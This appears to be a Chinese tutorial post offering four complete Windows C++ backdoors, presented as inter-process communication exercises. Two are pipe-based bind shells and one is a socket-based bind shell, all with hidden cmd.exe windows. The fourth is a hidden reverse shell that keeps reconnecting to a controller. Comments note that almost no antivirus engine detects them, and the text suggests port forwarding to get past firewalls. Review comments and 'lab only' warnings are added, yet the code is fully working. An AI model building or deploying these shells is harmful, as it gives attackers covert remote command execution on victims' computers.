先看看一个通过管道实现进程间通信的后门。注意:下面几份代码都没有任何认证和加密,任何能连到监听端口的主机都能以当前用户身份执行命令,仅供在隔离的实验环境中学习进程间通信使用。
//
// 模仿Telnet(服务器)小程序(单管道版,本地监听24端口)
//
// 病毒检测: 多引擎杀毒只有一款冰岛的杀毒软件查杀其他全过
//
// 客户端 : windows自带telnet客户端 或者 nc 都可以
//
// 小 BUG : 有的时候不能及时显示命令返回信息,再敲一个回车就可以了,查找原因时
// 每当调试就立即返回信息,去掉断点的话还是得多输入回车,郁闷。
//
#include "stdafx.h"
#include <stdio.h>
#include <windows.h>
#include <winsock.h>
#pragma comment (lib, "Ws2_32")
//这个版本虽然回显不正确,但是仍然可以执行命令
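// Spawn "cmd.exe /c <command>" with the shared STARTUPINFO (hidden window,
// stdin/stdout redirected to the pipe). The process and thread handles are
// closed immediately because the parent never waits on the child; the
// original leaked one pair per command.
//
// command: NUL-terminated text taken from the client and passed to cmd.exe
//          unchanged (no quoting or filtering). Anything longer than
//          MAX_PATH - 12 bytes is silently truncated, as in the original.
// si:      STARTUPINFO prepared by main(); reused for every command.
static void RunRemoteCommand(const char *command, STARTUPINFO *si)
{
    char cmdLine[MAX_PATH] = {0};
    // MAX_PATH - 1 keeps the buffer NUL-terminated even when _snprintf
    // truncates (MSVC's _snprintf does not terminate on truncation).
    _snprintf(cmdLine, MAX_PATH - 1, "cmd.exe /c %s", command);

    PROCESS_INFORMATION pi;
    if (CreateProcess(NULL, cmdLine, NULL, NULL, TRUE, 0, NULL, NULL, si, &pi))
    {
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
}

// Single-pipe "telnet-like" command server.
//
// Listens on TCP port 24 on every interface, accepts ONE client, starts a
// hidden cmd.exe whose stdin and stdout are the two ends of the same
// anonymous pipe, then loops: if the pipe holds data it is forwarded to the
// client, otherwise one recv() is taken from the client and executed via
// "cmd.exe /c <command>" (see RunRemoteCommand).
//
// Two client styles are handled, as in the original:
//   - telnet (character mode): bytes arrive one at a time; the line is
//     assembled in `command` and executed when CR (or CR LF) arrives.
//     "exit" / "bye" ends the session.
//   - nc (line mode): the whole line arrives in one recv() and is executed
//     as-is (its trailing newline is tolerated by cmd.exe).
//
// Known limitations kept from the original design (the "needs an extra Enter"
// symptom in the file header): hReadPipe is both the persistent cmd.exe's
// stdin and the end this loop reads, so the child can read its own output
// back as input; and recv() blocks while child output is pending, so output
// is only forwarded after the client sends something. The two-pipe listing
// later in this file avoids the first problem.
//
// Fixes relative to the original: every socket/pipe call is checked; the
// per-character buffer is bounds-checked (it could be overrun before);
// recv() returning 0 / SOCKET_ERROR ends the session instead of spinning;
// the CR is no longer appended to the command; "exit"/"bye" are compared
// against the assembled command rather than the 1-2 byte receive buffer;
// STARTUPINFO.cb is set; handles and sockets are released on exit.
//
// Security (review): no authentication or encryption of any kind; whoever
// reaches port 24 gets a shell as the user running this. Lab use only.
//
// Returns 0 when the session ends normally, 1 if setup fails.
int main(int argc, char* argv[])
{
    WSADATA ws;
    if (WSAStartup(MAKEWORD(2, 2), &ws) != 0)
    {
        printf("WSAStartup failed\n");
        return 1;
    }

    struct sockaddr_in listenAddr;
    memset(&listenAddr, 0, sizeof(listenAddr));
    listenAddr.sin_family = AF_INET;
    listenAddr.sin_port = htons(24);
    listenAddr.sin_addr.S_un.S_addr = INADDR_ANY;   // every interface

    // SOCKET rather than int: on 64-bit Windows an int truncates the handle.
    SOCKET listenSock = socket(AF_INET, SOCK_STREAM, 0);
    if (listenSock == INVALID_SOCKET
        || bind(listenSock, (struct sockaddr *)&listenAddr, sizeof(listenAddr)) == SOCKET_ERROR
        || listen(listenSock, 5) == SOCKET_ERROR)
    {
        printf("bind/listen on port 24 failed: %d\n", WSAGetLastError());
        if (listenSock != INVALID_SOCKET)
            closesocket(listenSock);
        WSACleanup();
        return 1;
    }
    printf("等待连接中......\n");

    struct sockaddr_in peerAddr;
    int peerAddrSize = sizeof(peerAddr);
    SOCKET clientSock = accept(listenSock, (struct sockaddr *)&peerAddr, &peerAddrSize);
    // Single-client design: stop listening so later connections are refused
    // and the listening socket is not inherited by every cmd.exe spawned.
    closesocket(listenSock);
    if (clientSock == INVALID_SOCKET)
    {
        printf("accept failed: %d\n", WSAGetLastError());
        WSACleanup();
        return 1;
    }
    printf("已有客户端成功连接\n");

    // One anonymous pipe; both ends must be inheritable for cmd.exe.
    SECURITY_ATTRIBUTES pipeAttr;
    pipeAttr.nLength = sizeof(SECURITY_ATTRIBUTES);
    pipeAttr.lpSecurityDescriptor = NULL;
    pipeAttr.bInheritHandle = TRUE;
    HANDLE hReadPipe = NULL;
    HANDLE hWritePipe = NULL;
    if (!CreatePipe(&hReadPipe, &hWritePipe, &pipeAttr, 0))
    {
        printf("CreatePipe failed: %lu\n", GetLastError());
        closesocket(clientSock);
        WSACleanup();
        return 1;
    }

    STARTUPINFO si;
    memset(&si, 0, sizeof(si));
    si.cb = sizeof(si);   // required by CreateProcess; the original left it 0
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.wShowWindow = SW_HIDE;
    si.hStdOutput = hWritePipe;   // command output lands in the pipe...
    si.hStdInput = hReadPipe;     // ...which is also the child's stdin (see header note)

    // Persistent interactive cmd.exe from the original design; its banner and
    // prompt are the first output the client sees. Best effort, as before.
    PROCESS_INFORMATION pi;
    char cmdLine[MAX_PATH] = "cmd.exe";
    if (CreateProcess(NULL, cmdLine, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))
    {
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }

    char pipeBuf[MAX_PATH];
    char command[MAX_PATH] = {0};   // telnet path: assembled one byte per recv()
    int commandLen = 0;

    for (;;)
    {
        // Forward whatever the child has written so far.
        DWORD avail = 0;
        if (PeekNamedPipe(hReadPipe, NULL, 0, NULL, &avail, NULL) && avail > 0)
        {
            DWORD want = avail > sizeof(pipeBuf) ? (DWORD)sizeof(pipeBuf) : avail;
            DWORD got = 0;
            if (ReadFile(hReadPipe, pipeBuf, want, &got, NULL) && got > 0)
            {
                if (send(clientSock, pipeBuf, (int)got, 0) == SOCKET_ERROR)
                    break;   // client went away
            }
            continue;
        }

        // Nothing pending: block for client input. sizeof(buf) - 1 keeps
        // buf NUL-terminated for the nc path below.
        char buf[256] = {0};
        int n = recv(clientSock, buf, sizeof(buf) - 1, 0);
        if (n <= 0)
            break;   // 0 = orderly close, SOCKET_ERROR = failure; original spun forever here

        if (n == 1 || n == 2)
        {
            // telnet character mode: Enter arrives as CR LF (or CR alone).
            if (n == 1 && buf[0] == '\n')
                continue;   // stray LF after a CR already handled
            if (buf[0] != '\r')
            {
                // Bounds check: the original incremented without limit and
                // could write past `command`.
                if (commandLen < MAX_PATH - 1)
                    command[commandLen++] = buf[0];
                continue;
            }

            // CR terminates the line; the CR itself is not part of the command.
            printf("接受到命令:%s", command);
            if (strcmp(command, "exit") == 0 || strcmp(command, "bye") == 0)
                break;
            RunRemoteCommand(command, &si);
            commandLen = 0;
            memset(command, 0, sizeof(command));
        }
        else if (n > 3)
        {
            // nc / line-mode client: whole line in one receive.
            RunRemoteCommand(buf, &si);
            commandLen = 0;
            memset(command, 0, sizeof(command));
        }
        // n == 3 is ignored, as in the original.
    }

    CloseHandle(hWritePipe);
    CloseHandle(hReadPipe);
    closesocket(clientSock);
    WSACleanup();
    return 0;
}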
上面的小后门有个缺点是只能在本地监听、不能反弹连接(被控端处于内网或有防火墙时控制端连不进来);配合 lcx 这类端口转发工具或许可以绕过,但更直接的做法是由被控端主动连接控制端,下面给出一份这样的反弹式版本。
//
// 模仿Telnet(服务器)小程序(WSASocket版,反弹式连接)
//
// 病毒检测: 多引擎杀毒只有一款冰岛的杀毒软件查杀其他全过
//
// 客户端 : 反弹式连接,启动时指定控制端地址和端口 telnet serverip serverport
//
//
#include "stdafx.h"
#include <stdio.h>
#include <winsock2.h>
#include <Windows.h>
#pragma comment (lib, "Ws2_32")
//隐藏窗口
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
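// Reverse-connect shell: this process dials OUT to a controller and hands
// the socket to a hidden cmd.exe as stdin/stdout/stderr.
//
// Usage: telnet <serverip> <serverport>   (argv[1] dotted IPv4, argv[2] port)
//
// Flow: validate arguments, then forever { create a plain (non-overlapped)
// socket, retry connect() once a second until it succeeds, spawn cmd.exe on
// the socket, wait for that cmd.exe to exit, close the socket }.
//
// Fixes relative to the original: argv[1] is no longer copied with strncpy
// into a 20-byte buffer that could be left unterminated (inet_addr takes the
// argument directly and its result is checked); the port is range-checked;
// each loop iteration now waits for the spawned shell instead of immediately
// opening another connection (the original created a new socket + cmd.exe
// per iteration without ever closing them); STARTUPINFO.cb is set.
//
// The window is hidden by the linker pragma above, so the usage text is
// only visible when built as a console program.
//
// Security (review): plaintext, unauthenticated; the controller address is
// trusted blindly. Lab use only.
//
// Returns 0 on bad usage, 1 on invalid arguments or WSAStartup failure;
// otherwise never returns.
int main(int argc, char* argv[])
{
    if (argc != 3)
    {
        printf("==================================================\n");
        printf("========usage:telnet serverip serverport=========\n");
        printf("==================================================\n");
        return 0;
    }

    // inet_addr returns INADDR_NONE for anything that is not dotted-quad.
    unsigned long serverAddr = inet_addr(argv[1]);
    int serverPort = atoi(argv[2]);
    if (serverAddr == INADDR_NONE || serverPort <= 0 || serverPort > 65535)
    {
        printf("invalid server address or port\n");
        return 1;
    }

    WSADATA ws;
    if (WSAStartup(MAKEWORD(2, 2), &ws) != 0)
        return 1;

    struct sockaddr_in server;
    memset(&server, 0, sizeof(server));
    server.sin_family = AF_INET;
    server.sin_port = htons((u_short)serverPort);
    server.sin_addr.S_un.S_addr = serverAddr;

    for (;;)
    {
        // Flags 0 = a synchronous, non-overlapped socket. That is required for
        // the handle to work as a std handle of cmd.exe; the original comment
        // called it "asynchronous", which is the opposite of what is created.
        SOCKET sock = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);
        if (sock == INVALID_SOCKET)
        {
            Sleep(1000);
            continue;
        }

        // Retry once a second until the controller is listening.
        int rc;
        do
        {
            Sleep(1000);
            rc = connect(sock, (struct sockaddr *)&server, sizeof(server));
        } while (rc == SOCKET_ERROR);

        STARTUPINFO si;
        memset(&si, 0, sizeof(si));
        si.cb = sizeof(si);
        si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
        si.wShowWindow = SW_HIDE;
        // cmd.exe reads and writes the socket directly; no relay loop needed.
        si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)sock;

        PROCESS_INFORMATION pi;
        char cmdLine[] = "cmd.exe";
        if (CreateProcess(NULL, cmdLine, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))
        {
            CloseHandle(pi.hThread);
            // One session at a time: reconnect only after the shell ends.
            WaitForSingleObject(pi.hProcess, INFINITE);
            CloseHandle(pi.hProcess);
        }
        closesocket(sock);   // parent's copy; the original leaked one per loop
    }
    return 0;
}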
下面再给出两份代码:一份用两条管道(一条收命令输出、一条送命令输入)做本地监听,一份不用管道、直接把套接字交给 cmd.exe 做本地监听。有了上面两份代码,这两份的实用价值不大,只当作进程间通信的练习。
// Server.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <stdio.h>
#include <windows.h>
#include <winsock.h>
#pragma comment (lib, "Ws2_32")
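// Two-pipe local shell server (communication exercise).
//
// Listens on TCP 12345 on every interface, accepts ONE client, starts a
// hidden cmd.exe with its stdout/stderr on one anonymous pipe and its stdin
// on a second one, then relays: pipe output -> client, client input -> pipe.
// Separate pipes keep the child from reading its own output back, which is
// the defect of the single-pipe version earlier in this file.
//
// Fixes relative to the original: SECURITY_ATTRIBUTES.nLength was 15 (must
// be sizeof the struct); sockets are SOCKET, not int (truncated on 64-bit);
// all setup calls are checked; recv() returning 0 or SOCKET_ERROR ends the
// session instead of passing (unsigned)-1 bytes to WriteFile and reading far
// past the buffer; only the child's ends of the pipes are inheritable and
// the parent drops its copies of them, so when cmd.exe exits the output pipe
// breaks and the loop terminates instead of hanging; STARTUPINFO.cb is set.
//
// Remaining limitation kept from the original: recv() blocks while child
// output is pending, so output is forwarded only after the client sends
// something (a second thread or select() would be needed to fix that).
//
// Security (review): unauthenticated, plaintext shell. Lab use only.
//
// Returns 0 when the session ends, 1 if setup fails.
int main(int argc, char* argv[])
{
    WSADATA ws;
    if (WSAStartup(MAKEWORD(2, 2), &ws) != 0)
        return 1;

    struct sockaddr_in listenAddr;
    memset(&listenAddr, 0, sizeof(listenAddr));
    listenAddr.sin_family = AF_INET;
    listenAddr.sin_port = htons(12345);
    listenAddr.sin_addr.S_un.S_addr = INADDR_ANY;

    SOCKET listenSock = socket(AF_INET, SOCK_STREAM, 0);
    if (listenSock == INVALID_SOCKET
        || bind(listenSock, (struct sockaddr *)&listenAddr, sizeof(listenAddr)) == SOCKET_ERROR
        || listen(listenSock, 5) == SOCKET_ERROR)
    {
        printf("bind/listen on port 12345 failed: %d\n", WSAGetLastError());
        if (listenSock != INVALID_SOCKET)
            closesocket(listenSock);
        WSACleanup();
        return 1;
    }
    printf("等待连接中......");

    struct sockaddr_in peerAddr;
    int peerAddrSize = sizeof(peerAddr);
    SOCKET client = accept(listenSock, (struct sockaddr *)&peerAddr, &peerAddrSize);
    closesocket(listenSock);   // single client; also keeps it out of the child
    if (client == INVALID_SOCKET)
    {
        printf("accept failed: %d\n", WSAGetLastError());
        WSACleanup();
        return 1;
    }

    // childOut: cmd.exe writes, we read.  childIn: we write, cmd.exe reads.
    SECURITY_ATTRIBUTES sa;
    sa.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa.lpSecurityDescriptor = NULL;
    sa.bInheritHandle = TRUE;
    HANDLE childOutRead = NULL, childOutWrite = NULL;
    HANDLE childInRead = NULL, childInWrite = NULL;
    if (!CreatePipe(&childOutRead, &childOutWrite, &sa, 0)
        || !CreatePipe(&childInRead, &childInWrite, &sa, 0))
    {
        printf("CreatePipe failed: %lu\n", GetLastError());
        closesocket(client);
        WSACleanup();
        return 1;
    }
    // The parent-side ends must NOT be inherited: if cmd.exe held a write
    // handle to its own stdin pipe it would never see EOF, and if it held the
    // read end of its stdout pipe the pipe would never break.
    SetHandleInformation(childOutRead, HANDLE_FLAG_INHERIT, 0);
    SetHandleInformation(childInWrite, HANDLE_FLAG_INHERIT, 0);

    STARTUPINFO si;
    memset(&si, 0, sizeof(si));
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.wShowWindow = SW_HIDE;
    si.hStdOutput = si.hStdError = childOutWrite;
    si.hStdInput = childInRead;

    PROCESS_INFORMATION pi;
    char cmdLine[MAX_PATH] = "cmd.exe";
    BOOL started = CreateProcess(NULL, cmdLine, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
    // Drop our copies of the child's ends so pipe EOF/break is detectable.
    CloseHandle(childOutWrite);
    CloseHandle(childInRead);
    if (!started)
    {
        printf("CreateProcess failed: %lu\n", GetLastError());
        CloseHandle(childOutRead);
        CloseHandle(childInWrite);
        closesocket(client);
        WSACleanup();
        return 1;
    }
    CloseHandle(pi.hThread);

    char buf[MAX_PATH];
    for (;;)
    {
        DWORD avail = 0;
        if (!PeekNamedPipe(childOutRead, NULL, 0, NULL, &avail, NULL))
            break;   // child exited (pipe broken)
        if (avail > 0)
        {
            DWORD want = avail > sizeof(buf) ? (DWORD)sizeof(buf) : avail;
            DWORD got = 0;
            if (!ReadFile(childOutRead, buf, want, &got, NULL))
                break;
            if (send(client, buf, (int)got, 0) == SOCKET_ERROR)
                break;
            continue;
        }

        int n = recv(client, buf, sizeof(buf), 0);
        if (n <= 0)
            break;   // orderly close or error; never hand a negative count to WriteFile
        DWORD written = 0;
        if (!WriteFile(childInWrite, buf, (DWORD)n, &written, NULL))
            break;
    }

    // Closing the stdin write end gives cmd.exe EOF so it can exit on its own.
    CloseHandle(childInWrite);
    CloseHandle(childOutRead);
    CloseHandle(pi.hProcess);
    closesocket(client);
    WSACleanup();
    return 0;
}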
// Server.cpp : Defines the entry point for the console application.
//
#include <stdio.h>
#include <winsock2.h>
#pragma comment (lib, "Ws2_32")
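// No-pipe local shell server (communication exercise).
//
// Listens on TCP 12345 on every interface, accepts ONE client, and starts a
// hidden cmd.exe whose stdin/stdout/stderr are the accepted socket itself.
// The parent then exits; cmd.exe keeps its inherited copy of the socket, so
// the session outlives this process (same as the original).
//
// The listening socket is created with WSASocket(..., flags = 0), i.e. a
// synchronous, non-overlapped socket (the commented-out socket() call in the
// original shows the author switched deliberately). The accepted socket
// inherits that property, which is what lets cmd.exe use it as a std handle.
//
// Fixes relative to the original: sockets are SOCKET, not int (truncated on
// 64-bit); bind/listen/accept/CreateProcess are checked; STARTUPINFO.cb is
// set; the process/thread handles are closed.
//
// Security (review): unauthenticated, plaintext shell. Lab use only.
//
// Returns 0 once cmd.exe has been started, 1 on any setup failure.
int main(int argc, char* argv[])
{
    WSADATA ws;
    if (WSAStartup(MAKEWORD(2, 2), &ws) != 0)
        return 1;

    struct sockaddr_in listenAddr;
    memset(&listenAddr, 0, sizeof(listenAddr));
    listenAddr.sin_family = AF_INET;
    listenAddr.sin_port = htons(12345);
    listenAddr.sin_addr.S_un.S_addr = INADDR_ANY;

    SOCKET listenSock = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);
    if (listenSock == INVALID_SOCKET
        || bind(listenSock, (struct sockaddr *)&listenAddr, sizeof(listenAddr)) == SOCKET_ERROR
        || listen(listenSock, 5) == SOCKET_ERROR)
    {
        printf("bind/listen on port 12345 failed: %d\n", WSAGetLastError());
        if (listenSock != INVALID_SOCKET)
            closesocket(listenSock);
        WSACleanup();
        return 1;
    }
    printf("等待连接中......");

    struct sockaddr_in peerAddr;
    int peerAddrSize = sizeof(peerAddr);
    SOCKET client = accept(listenSock, (struct sockaddr *)&peerAddr, &peerAddrSize);
    closesocket(listenSock);   // one client only; keep the listener out of the child
    if (client == INVALID_SOCKET)
    {
        printf("accept failed: %d\n", WSAGetLastError());
        WSACleanup();
        return 1;
    }

    STARTUPINFO si;
    memset(&si, 0, sizeof(si));
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.wShowWindow = SW_HIDE;
    // cmd.exe talks to the client through the socket directly.
    si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)client;

    PROCESS_INFORMATION pi;
    char cmdLine[MAX_PATH] = "cmd.exe";
    int rc = 0;
    if (CreateProcess(NULL, cmdLine, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))
    {
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
    else
    {
        printf("CreateProcess failed: %lu\n", GetLastError());
        rc = 1;
    }
    // Deliberately NOT closing `client` here: the original left it open until
    // process exit, and the child's inherited copy carries the session on.
    return rc;
}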